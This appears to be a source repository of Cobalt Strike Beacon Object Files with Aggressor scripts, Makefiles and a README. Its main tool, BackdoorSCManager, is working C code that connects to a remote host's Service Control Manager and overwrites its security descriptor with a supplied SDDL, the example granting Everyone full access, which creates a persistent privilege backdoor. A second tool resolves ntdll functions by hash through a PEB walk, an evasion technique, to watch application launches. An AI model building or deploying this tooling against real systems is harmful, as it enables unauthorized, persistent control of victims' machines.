├── .gitignore ├── BackdoorSCManager ├── BackdoorSCManager.cna ├── Makefile └── entry.c ├── LICENSE ├── README.md ├── SubscribeWNF ├── Makefile ├── SubscribeWNF.cna ├── entry.c └── typedefs.h ├── make_all.sh └── template ├── Makefile ├── entry.c └── template.cna /.gitignore: -------------------------------------------------------------------------------- 1 | **/beacon.h 2 | **/dist/ 3 | -------------------------------------------------------------------------------- /BackdoorSCManager/BackdoorSCManager.cna: -------------------------------------------------------------------------------- 1 | alias backdoor-scmanager { 2 | local('$arch $handle $bof $args'); 3 | 4 | $arch = barch($1); 5 | 6 | $handle = openf(script_resource("dist/backdoor-scmanager. $+ $arch $+ .o")); 7 | $bof = readb($handle, -1); 8 | closef($handle); 9 | 10 | $args = bof_pack($1, "zz", $2, $3); 11 | 12 | btask($1, "Running BackdoorSCManager BOF"); 13 | 14 | beacon_inline_execute($1, $bof, "go", $args); 15 | } 16 | 17 | beacon_command_register( 18 | "backdoor-scmanager", 19 | "Backdoors SCManager SDDL", 20 | "\ 21 | usage: backdoor-scmanager \ 22 | example: backdoor-scmanager SRV01.megacorp.local D:(A;;KA;;;WD)"); 23 | -------------------------------------------------------------------------------- /BackdoorSCManager/Makefile: -------------------------------------------------------------------------------- 1 | BOFNAME := backdoor-scmanager.x64 2 | BOFDIR := dist 3 | CC_x64 := x86_64-w64-mingw32-gcc 4 | 5 | all: 6 | @cp ../beacon.h . 7 | @mkdir -p $(BOFDIR) 8 | $(CC_x64) -o $(BOFDIR)/$(BOFNAME).o -c entry.c 9 | 10 | clean: 11 | rm -f beacon.h $(BOFDIR)/$(BOFNAME).o 12 | -------------------------------------------------------------------------------- /BackdoorSCManager/entry.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "beacon.h" 3 | #define SDDL_REVISION_1 1 4 | 5 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$OpenProcessToken(HANDLE, DWORD, PHANDLE); 6 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$ImpersonateLoggedOnUser(HANDLE); 7 | DECLSPEC_IMPORT SC_HANDLE WINAPI ADVAPI32$OpenSCManagerA(LPCSTR, LPCSTR, DWORD); 8 | DECLSPEC_IMPORT SC_HANDLE WINAPI ADVAPI32$OpenServiceA(SC_HANDLE, LPCSTR, DWORD); 9 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$QueryServiceObjectSecurity(SC_HANDLE, SECURITY_INFORMATION, PSECURITY_DESCRIPTOR, DWORD, LPDWORD); 10 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$ConvertSecurityDescriptorToStringSecurityDescriptorA(PSECURITY_DESCRIPTOR, DWORD, SECURITY_INFORMATION, LPSTR*, PULONG); 11 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$ConvertStringSecurityDescriptorToSecurityDescriptorA(LPCSTR, DWORD, PSECURITY_DESCRIPTOR, PULONG); 12 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$SetServiceObjectSecurity(SC_HANDLE, SECURITY_INFORMATION, PSECURITY_DESCRIPTOR); 13 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CloseServiceHandle(SC_HANDLE); 14 | DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalAlloc(UINT, SIZE_T); 15 | DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalFree(HLOCAL); 16 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(); 17 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess(); 18 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CloseHandle(HANDLE); 19 | 20 | // Inspired by @0gtweet: https://twitter.com/0gtweet/status/1628720819537936386 21 | VOID go(char* args, int alen) { 22 | datap parser; 23 | CHAR* targetHost; 24 | CHAR* pSDDL; 25 | 26 | BeaconDataParse(&parser, args, alen); 27 | targetHost = BeaconDataExtract(&parser, NULL); 28 | pSDDL = BeaconDataExtract(&parser, NULL); 29 | 30 | // Stolen from: https://github.com/Mr-Un1k0d3r/SCShell/blob/c6cd4328354b0a33902eea9cba9f459f97f6108c/CS-BOF/scshellbof.c#L40-L55 31 | HANDLE hToken = NULL; 32 | if(!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)) { 33 | BeaconPrintf(CALLBACK_OUTPUT, "ADVAPI32$OpenProcessToken failed: %ld\n", KERNEL32$GetLastError()); 34 | return; 35 | } 36 | 37 | if(!ADVAPI32$ImpersonateLoggedOnUser(hToken)) { 38 | BeaconPrintf(CALLBACK_OUTPUT, "ADVAPI32$ImpersonateLoggedOnUser failed: %ld\n", KERNEL32$GetLastError()); 39 | return; 40 | } 41 | 42 | BeaconPrintf(CALLBACK_OUTPUT, "Trying to connect to %s...\n", targetHost); 43 | 44 | SC_HANDLE scManager = NULL; 45 | if (!(scManager = ADVAPI32$OpenSCManagerA(targetHost, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS))) { 46 | BeaconPrintf(CALLBACK_OUTPUT, "ADVAPI32$OpenSCManager failed: %ld\n", KERNEL32$GetLastError()); 47 | return; 48 | } 49 | 50 | PSECURITY_DESCRIPTOR pSecurityDescriptor = NULL; 51 | DWORD dwBytesNeeded = 0; 52 | if (!ADVAPI32$QueryServiceObjectSecurity(scManager, DACL_SECURITY_INFORMATION, pSecurityDescriptor, 0, &dwBytesNeeded) && KERNEL32$GetLastError() == ERROR_INSUFFICIENT_BUFFER) { 53 | if (!(pSecurityDescriptor = (PSECURITY_DESCRIPTOR)KERNEL32$LocalAlloc(LPTR, dwBytesNeeded))) { 54 | BeaconPrintf(CALLBACK_OUTPUT, "KERNEL32$LocalAlloc failed: %ld\n", KERNEL32$GetLastError()); 55 | ADVAPI32$CloseServiceHandle(scManager); 56 | return; 57 | } 58 | 59 | if (!ADVAPI32$QueryServiceObjectSecurity(scManager, DACL_SECURITY_INFORMATION, pSecurityDescriptor, dwBytesNeeded, &dwBytesNeeded)) { 60 | BeaconPrintf(CALLBACK_OUTPUT, "ADVAPI32$QueryServiceObjectSecurity (actual sd) failed: %ld\n", KERNEL32$GetLastError()); 61 | KERNEL32$LocalFree(pSecurityDescriptor); 62 | ADVAPI32$CloseServiceHandle(scManager); 63 | return; 64 | } 65 | } 66 | else { 67 | BeaconPrintf(CALLBACK_OUTPUT, "ADVAPI32$QueryServiceObjectSecurity (sd size) failed: %ld\n", KERNEL32$GetLastError()); 68 | return; 69 | } 70 | 71 | LPSTR pStringSecurityDescriptor = NULL; 72 | if (!ADVAPI32$ConvertSecurityDescriptorToStringSecurityDescriptorA(pSecurityDescriptor, SDDL_REVISION_1, DACL_SECURITY_INFORMATION, &pStringSecurityDescriptor, NULL)) { 73 | BeaconPrintf(CALLBACK_OUTPUT, "ADVAPI32$ConvertSecurityDescriptorToStringSecurityDescriptorA failed: %ld\n", KERNEL32$GetLastError()); 74 | KERNEL32$LocalFree(pSecurityDescriptor); 75 | ADVAPI32$CloseServiceHandle(scManager); 76 | return; 77 | } 78 | 79 | BeaconPrintf(CALLBACK_OUTPUT, "Current SDDL to backup:\n%s\n", pStringSecurityDescriptor); 80 | 81 | KERNEL32$LocalFree(pSecurityDescriptor); 82 | KERNEL32$LocalFree(pStringSecurityDescriptor); 83 | 84 | pSecurityDescriptor = NULL; 85 | if (!ADVAPI32$ConvertStringSecurityDescriptorToSecurityDescriptorA(pSDDL, SDDL_REVISION_1, &pSecurityDescriptor, NULL)) { 86 | // D:(A;;KA;;;WD) is SDDL_EVERYONE -> SDDL_KEY_ALL 87 | BeaconPrintf(CALLBACK_OUTPUT, "ADVAPI32$ConvertStringSecurityDescriptorToSecurityDescriptorA failed: %ld\n", KERNEL32$GetLastError()); 88 | ADVAPI32$CloseServiceHandle(scManager); 89 | return; 90 | } 91 | 92 | if (!ADVAPI32$SetServiceObjectSecurity(scManager, DACL_SECURITY_INFORMATION, pSecurityDescriptor)) { 93 | BeaconPrintf(CALLBACK_OUTPUT, "ADVAPI32$SetServiceObjectSecurity failed: %ld\n", KERNEL32$GetLastError()); 94 | KERNEL32$LocalFree(pSecurityDescriptor); 95 | ADVAPI32$CloseServiceHandle(scManager); 96 | return; 97 | } 98 | 99 | BeaconPrintf(CALLBACK_OUTPUT, "Done, SCManager SDDL was successfully changed!\n"); 100 | 101 | KERNEL32$LocalFree(pSecurityDescriptor); 102 | ADVAPI32$CloseServiceHandle(scManager); 103 | 104 | return; 105 | } 106 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 2-Clause License 2 | 3 | Copyright (c) 2023, @snovvcrash 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 17 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 18 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 19 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 20 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 21 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 22 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 23 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 24 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 25 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 26 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | BOFs 2 | ========== 3 | 4 | Get `beacon.h`: 5 | 6 | ```console 7 | ~$ curl -sS https://download.cobaltstrike.com/downloads/beacon.h -o beacon.h 8 | ``` 9 | 10 | Build all the BOFs: 11 | 12 | ```console 13 | ~$ ./make_all.sh 14 | ``` 15 | 16 | Build a single BOF: 17 | 18 | ```console 19 | ~$ cp beacon.h && cd 20 | ~$ make 21 | ``` 22 | 23 | > **DISCLAIMER.** All information contained in this repository is provided for educational and research purposes only. The owner is not responsible for any illegal use of included code snippets. 24 | 25 | ## [BackdoorSCManager](/BackdoorSCManager) 26 | 27 | Backdoors SCManager SDDL. 28 | 29 | ### Help 30 | 31 | ``` 32 | usage: backdoor-scmanager 33 | example: backdoor-scmanager SRV01.megacorp.local D:(A;;KA;;;WD) 34 | ``` 35 | 36 | ### References 37 | 38 | - https://twitter.com/0gtweet/status/1628720819537936386 39 | 40 | ## [SubscribeWNF](/SubscribeWNF) (No Profit, Training Only) 41 | 42 | Subscribes to [WNF notifications](https://www.youtube.com/watch?v=MybmgE95weo) for a number of seconds. 43 | 44 | ### Help 45 | 46 | ``` 47 | usage: subscribe-wnf 48 | example: subscribe-wnf 10 49 | ``` 50 | 51 | ### References 52 | 53 | - https://github.com/gtworek/PSBits/tree/master/WNF 54 | - https://www.youtube.com/watch?v=oyshXuCH__w 55 | -------------------------------------------------------------------------------- /SubscribeWNF/Makefile: -------------------------------------------------------------------------------- 1 | BOFNAME := backdoor-scmanager.x64 2 | BOFDIR := dist 3 | CC_x64 := x86_64-w64-mingw32-gcc 4 | 5 | all: 6 | @cp ../beacon.h . 7 | @mkdir -p $(BOFDIR) 8 | $(CC_x64) -o $(BOFDIR)/$(BOFNAME).o -c entry.c 9 | 10 | clean: 11 | rm -f $(BOFDIR)/$(BOFNAME).o 12 | -------------------------------------------------------------------------------- /SubscribeWNF/SubscribeWNF.cna: -------------------------------------------------------------------------------- 1 | alias subscribe-wnf { 2 | local('$arch $handle $bof $args'); 3 | 4 | $arch = barch($1); 5 | 6 | $handle = openf(script_resource("dist/subscribe-wnf. $+ $arch $+ .o")); 7 | $bof = readb($handle, -1); 8 | closef($handle); 9 | 10 | $args = bof_pack($1, "i", $2); 11 | 12 | btask($1, "Running SubscribeWNF BOF"); 13 | 14 | beacon_inline_execute($1, $bof, "go", $args); 15 | } 16 | 17 | beacon_command_register( 18 | "subscribe-wnf", 19 | "Subscribes to WNF notifications for a number of seconds", 20 | "\ 21 | usage: subscribe-wnf \ 22 | example: subscribe-wnf 10"); 23 | -------------------------------------------------------------------------------- /SubscribeWNF/entry.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "typedefs.h" 3 | #include "beacon.h" 4 | 5 | #define HashStringNtdll 0x467f5122 6 | #define HashStringRtlSubscribeWnfStateChangeNotification 0x2098e735 7 | #define HashStringRtlUnsubscribeWnfStateChangeNotification 0x83d07400 8 | 9 | #define HashStringA(x) HashStringFowlerNollVoVariant1aA(x) 10 | #define HashStringW(x) HashStringFowlerNollVoVariant1aW(x) 11 | 12 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$WaitForSingleObject(HANDLE, DWORD); 13 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ReleaseMutex(HANDLE); 14 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateMutexA(LPSECURITY_ATTRIBUTES, BOOL, LPCSTR); 15 | DECLSPEC_IMPORT VOID WINAPI KERNEL32$Sleep(DWORD); 16 | 17 | DWORDLONG WNF_SHEL_APPLICATION_STARTED = 0x0d83063ea3be0075; 18 | //DWORDLONG WNF_SHEL_DESKTOP_APPLICATION_STARTED = 0x0d83063ea3be5075; 19 | DWORDLONG WNF_SHEL_APPLICATION_TERMINATED = 0x0d83063ea3be0875; 20 | //DWORDLONG WNF_SHEL_DESKTOP_APPLICATION_TERMINATED = 0x0d83063ea3be5875; 21 | 22 | HANDLE _callbackMutex __attribute__ ((section(".data"))); 23 | 24 | ULONG HashStringFowlerNollVoVariant1aA(_In_ LPCSTR String) { 25 | ULONG Hash = 0x6A6CCC06; 26 | 27 | while (*String) { 28 | Hash ^= (UCHAR)*String++; 29 | Hash *= 0x25EDE3FB; 30 | } 31 | 32 | return Hash; 33 | } 34 | 35 | ULONG HashStringFowlerNollVoVariant1aW(_In_ LPCWSTR String) { 36 | ULONG Hash = 0x6A6CCC06; 37 | 38 | while (*String) { 39 | Hash ^= (UCHAR)*String++; 40 | Hash *= 0x25EDE3FB; 41 | } 42 | 43 | return Hash; 44 | } 45 | 46 | HMODULE _GetModuleHandle(_In_ ULONG dllHash) { 47 | PLIST_ENTRY head = (PLIST_ENTRY) & ((PPEB)__readgsqword(0x60))->Ldr->InMemoryOrderModuleList; 48 | PLIST_ENTRY next = head->Flink; 49 | 50 | PLDR_MODULE module = (PLDR_MODULE)((PBYTE)next - 16); 51 | 52 | while (next != head) { 53 | module = (PLDR_MODULE)((PBYTE)next - 16); 54 | if (module->BaseDllName.Buffer != NULL) { 55 | if (dllHash - HashStringW(module->BaseDllName.Buffer) == 0) 56 | return (HMODULE)module->BaseAddress; 57 | } 58 | next = next->Flink; 59 | } 60 | 61 | return NULL; 62 | } 63 | 64 | // Stolen from: https://github.com/iilegacyyii/ThreadlessInject-BOF/blob/fad40ed164e83504ef0c1e5180990a9bb147d8d2/entry.c#L62 65 | FARPROC _GetProcAddress(_In_ HMODULE dllBase, _In_ ULONG funcHash) { 66 | PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)(dllBase); 67 | PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)((PBYTE)dos + (dos)->e_lfanew); 68 | PIMAGE_EXPORT_DIRECTORY exports = 69 | (PIMAGE_EXPORT_DIRECTORY)((PBYTE)dos + (nt)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); 70 | 71 | if (exports->AddressOfNames != 0) { 72 | PWORD ordinals = (PWORD)((UINT_PTR)dllBase + exports->AddressOfNameOrdinals); 73 | PDWORD names = (PDWORD)((UINT_PTR)dllBase + exports->AddressOfNames); 74 | PDWORD functions = (PDWORD)((UINT_PTR)dllBase + exports->AddressOfFunctions); 75 | 76 | for (DWORD i = 0; i < exports->NumberOfNames; i++) { 77 | LPCSTR name = (LPCSTR)((UINT_PTR)dllBase + names[i]); 78 | if (HashStringA(name) == funcHash) { 79 | PBYTE function = (PBYTE)((UINT_PTR)dllBase + functions[ordinals[i]]); 80 | return (FARPROC)function; 81 | } 82 | } 83 | } 84 | 85 | return NULL; 86 | } 87 | 88 | NTSTATUS NTAPI WnfCallback(DWORDLONG p1, PVOID p2, PVOID p3, PVOID p4, PVOID p5, PVOID p6) { 89 | KERNEL32$WaitForSingleObject(_callbackMutex, INFINITE); 90 | 91 | LPCWSTR stateName; 92 | if (p1 == WNF_SHEL_APPLICATION_STARTED) 93 | stateName = L"APPLICATION_STARTED"; 94 | //else if (p1 == WNF_SHEL_DESKTOP_APPLICATION_STARTED) 95 | // stateName = L"DESKTOP_APPLICATION_STARTED"; 96 | else if (p1 == WNF_SHEL_APPLICATION_TERMINATED) 97 | stateName = L"APPLICATION_TERMINATED"; 98 | //else if (p1 == WNF_SHEL_DESKTOP_APPLICATION_TERMINATED) 99 | // stateName = L"DESKTOP_APPLICATION_TERMINATED"; 100 | else 101 | stateName = L"UNKNOWN"; 102 | 103 | BeaconPrintf(CALLBACK_OUTPUT, "%ls --> %ls\n", stateName, (LPCWSTR)p5); 104 | 105 | KERNEL32$ReleaseMutex(_callbackMutex); 106 | 107 | return 0; 108 | } 109 | 110 | PVOID subscribe(DWORDLONG stateName) { 111 | PVOID* subscription; 112 | DWORD changeStamp; 113 | 114 | HMODULE ntdllBase = _GetModuleHandle(HashStringNtdll); 115 | 116 | typeRtlSubscribeWnfStateChangeNotification pRtlSubscribeWnfStateChangeNotification = 117 | (typeRtlSubscribeWnfStateChangeNotification)_GetProcAddress( 118 | ntdllBase, 119 | HashStringRtlSubscribeWnfStateChangeNotification); 120 | 121 | NTSTATUS ntstatus = pRtlSubscribeWnfStateChangeNotification( 122 | &subscription, 123 | stateName, 124 | changeStamp, 125 | WnfCallback, 126 | 0, 127 | 0, 128 | 0, 129 | 1); 130 | 131 | if (ntstatus != 0) { 132 | BeaconPrintf(CALLBACK_OUTPUT, "Subscription %llx failed: %08x\n", stateName, ntstatus); 133 | return NULL; 134 | } 135 | 136 | return subscription; 137 | } 138 | 139 | NTSTATUS unsubscribe(PVOID subscription, DWORDLONG stateName) { 140 | HMODULE ntdllBase = _GetModuleHandle(HashStringNtdll); 141 | 142 | typeRtlUnsubscribeWnfStateChangeNotification pRtlUnsubscribeWnfStateChangeNotification = 143 | (typeRtlUnsubscribeWnfStateChangeNotification)_GetProcAddress( 144 | ntdllBase, 145 | HashStringRtlUnsubscribeWnfStateChangeNotification); 146 | 147 | NTSTATUS ntstatus = pRtlUnsubscribeWnfStateChangeNotification(subscription); 148 | 149 | if (ntstatus != 0) 150 | BeaconPrintf(CALLBACK_OUTPUT, "Unsubscription %llx failed: %08x\n", stateName, ntstatus); 151 | 152 | return ntstatus; 153 | } 154 | 155 | void go(char* args, int alen) { 156 | datap parser; 157 | BeaconDataParse(&parser, args, alen); 158 | SIZE_T seconds = BeaconDataInt(&parser); 159 | 160 | _callbackMutex = KERNEL32$CreateMutexA(NULL, FALSE, NULL); 161 | if (!_callbackMutex) 162 | return; 163 | 164 | KERNEL32$WaitForSingleObject(_callbackMutex, INFINITE); 165 | 166 | PVOID subscription1, subscription2, subscription3, subscription4; 167 | if ((subscription1 = subscribe(WNF_SHEL_APPLICATION_STARTED)) == NULL) 168 | return; 169 | //if ((subscription2 = subscribe(WNF_SHEL_DESKTOP_APPLICATION_STARTED)) == NULL) { 170 | // unsubscribe(subscription1, WNF_SHEL_APPLICATION_STARTED); 171 | // return; 172 | //} 173 | if ((subscription3 = subscribe(WNF_SHEL_APPLICATION_TERMINATED)) == NULL) { 174 | //unsubscribe(subscription2, WNF_SHEL_DESKTOP_APPLICATION_STARTED); 175 | unsubscribe(subscription1, WNF_SHEL_APPLICATION_STARTED); 176 | return; 177 | } 178 | //if ((subscription4 = subscribe(WNF_SHEL_DESKTOP_APPLICATION_TERMINATED)) == NULL) { 179 | // unsubscribe(subscription3, WNF_SHEL_APPLICATION_TERMINATED); 180 | // unsubscribe(subscription2, WNF_SHEL_DESKTOP_APPLICATION_STARTED); 181 | // unsubscribe(subscription1, WNF_SHEL_APPLICATION_STARTED); 182 | // return; 183 | //} 184 | 185 | KERNEL32$ReleaseMutex(_callbackMutex); 186 | 187 | KERNEL32$Sleep((DWORD)seconds * 1000); 188 | 189 | //unsubscribe(subscription4, WNF_SHEL_DESKTOP_APPLICATION_TERMINATED); 190 | unsubscribe(subscription3, WNF_SHEL_APPLICATION_TERMINATED); 191 | //unsubscribe(subscription2, WNF_SHEL_DESKTOP_APPLICATION_STARTED); 192 | unsubscribe(subscription1, WNF_SHEL_APPLICATION_STARTED); 193 | 194 | return; 195 | } 196 | -------------------------------------------------------------------------------- /SubscribeWNF/typedefs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | typedef struct _UNICODE_STRING { 4 | USHORT Length; 5 | USHORT MaximumLength; 6 | PWSTR Buffer; 7 | } UNICODE_STRING, * PUNICODE_STRING; 8 | 9 | typedef struct _LDR_MODULE { 10 | LIST_ENTRY InLoadOrderModuleList; 11 | LIST_ENTRY InMemoryOrderModuleList; 12 | LIST_ENTRY InInitializationOrderModuleList; 13 | PVOID BaseAddress; 14 | PVOID EntryPoint; 15 | ULONG SizeOfImage; 16 | UNICODE_STRING FullDllName; 17 | UNICODE_STRING BaseDllName; 18 | ULONG Flags; 19 | SHORT LoadCount; 20 | SHORT TlsIndex; 21 | LIST_ENTRY HashTableEntry; 22 | ULONG TimeDateStamp; 23 | } LDR_MODULE, * PLDR_MODULE; 24 | 25 | typedef struct _PEB_LDR_DATA { 26 | BYTE Reserved1[8]; 27 | PVOID Reserved2[3]; 28 | LIST_ENTRY InMemoryOrderModuleList; 29 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 30 | 31 | typedef struct _RTL_USER_PROCESS_PARAMETERS { 32 | ULONG MaximumLength; 33 | ULONG Length; 34 | ULONG Flags; 35 | ULONG DebugFlags; 36 | PVOID ConsoleHandle; 37 | ULONG ConsoleFlags; 38 | HANDLE StdInputHandle; 39 | HANDLE StdOutputHandle; 40 | HANDLE StdErrorHandle; 41 | UNICODE_STRING CurrentDirectoryPath; 42 | HANDLE CurrentDirectoryHandle; 43 | UNICODE_STRING DllPath; 44 | UNICODE_STRING ImagePathName; 45 | UNICODE_STRING CommandLine; 46 | PVOID Environment; 47 | } RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; 48 | 49 | typedef struct _PEB { 50 | BYTE Reserved1[2]; 51 | BYTE BeingDebugged; 52 | BYTE Reserved2[1]; 53 | PVOID Reserved3[2]; 54 | PPEB_LDR_DATA Ldr; 55 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; 56 | BYTE Reserved4[104]; 57 | PVOID Reserved5[52]; 58 | PVOID PostProcessInitRoutine; 59 | BYTE Reserved6[128]; 60 | PVOID Reserved7[1]; 61 | ULONG SessionId; 62 | } PEB, * PPEB; 63 | 64 | typedef NTSTATUS(NTAPI* typeWnfCallback) 65 | (DWORDLONG, PVOID, PVOID, PVOID, PVOID, PVOID); 66 | 67 | typedef NTSTATUS(NTAPI* typeRtlSubscribeWnfStateChangeNotification) 68 | (PVOID, DWORDLONG, DWORD, typeWnfCallback, SIZE_T, SIZE_T, SIZE_T, SIZE_T); 69 | 70 | typedef NTSTATUS(NTAPI* typeRtlUnsubscribeWnfStateChangeNotification) 71 | (PVOID); 72 | -------------------------------------------------------------------------------- /make_all.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | shopt -s extglob 4 | 5 | for d in !(template)/; do 6 | pushd "${d}" > /dev/null 7 | make "$@" 8 | popd > /dev/null 9 | done 10 | -------------------------------------------------------------------------------- /template/Makefile: -------------------------------------------------------------------------------- 1 | BOFNAME := backdoor-scmanager.x64 2 | BOFDIR := dist 3 | CC_x64 := x86_64-w64-mingw32-gcc 4 | 5 | all: 6 | @cp ../beacon.h . 7 | @mkdir -p $(BOFDIR) 8 | $(CC_x64) -o $(BOFDIR)/$(BOFNAME).o -c entry.c 9 | 10 | clean: 11 | rm -f beacon.h $(BOFDIR)/$(BOFNAME).o 12 | -------------------------------------------------------------------------------- /template/entry.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "beacon.h" 3 | 4 | VOID go(char* args, int alen) { 5 | datap parser; 6 | 7 | BeaconDataParse(&parser, args, alen); 8 | 9 | return; 10 | } 11 | -------------------------------------------------------------------------------- /template/template.cna: -------------------------------------------------------------------------------- 1 | alias template { 2 | local('$arch $handle $bof $args'); 3 | 4 | $arch = barch($1); 5 | 6 | $handle = openf(script_resource("dist/template. $+ $arch $+ .o")); 7 | $bof = readb($handle, -1); 8 | closef($handle); 9 | 10 | $args = bof_pack($1, "i", $2); 11 | 12 | btask($1, "Running Template BOF"); 13 | 14 | beacon_inline_execute($1, $bof, "go", $args); 15 | } 16 | 17 | beacon_command_register( 18 | "template", 19 | "Description", 20 | "\ 21 | usage: template \ 22 | example: template 1337"); 23 | --------------------------------------------------------------------------------